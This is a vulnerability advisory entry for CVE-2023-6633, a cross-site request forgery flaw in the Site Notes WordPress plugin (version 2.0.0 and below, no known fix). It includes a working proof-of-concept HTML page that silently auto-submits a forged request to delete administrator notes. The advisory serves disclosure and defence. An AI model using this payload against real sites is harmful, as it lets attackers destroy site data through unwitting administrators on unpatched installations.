WordPress Plugin Vulnerabilities

Site Notes <= 2.0.0 - Admin Note Deletion via CSRF

Description

The plugin does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks

Proof of Concept

Have an administrator open the following HTML file:

<html>
  <body>
    <form action="http://<TARGET-DOMAIN>/wp-content/plugins/site-notes/ajax-calls.php" method="POST">
      <input type="hidden" name="meta" value="note" />
      <input type="hidden" name="id" value="<POST_ID>" />
      <input type="hidden" name="value" value="DELETEALL!!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

Plugin icon
site-notes
No known fix

References

CVE
CVE-2023-6633

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Pedro Cuco (Illex)
Submitter
Pedro Cuco (Illex)
Submitter twitter
pcuco92
Verified
Yes
WPVDB ID
eb983d82-b894-41c5-b51f-94d4bba3ba39

Timeline

Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-03 (about 4 months ago)

Other

Published
Title
Published
2024-04-10
Title
Table & Contact Form 7 Database – Tablesome < 1.0.26 - Cross-Site Request Forgery
Published
2024-01-24
Title
Paid Memberships Pro < 2.12.8 - Cross-Site Request Forgery
Published
2021-11-29
Title
Contact Form With Captcha < 1.6.8 - CSRF to Stored Cross-Site Scripting
Published
2024-01-23
Title
Ultimate Noindex Nofollow Tool <= 1.1.2 - Settings Update via CSRF
Published
2020-09-16
Title
Radio Buttons for Taxonomies < 2.0.6 - Cross-Site Request Forgery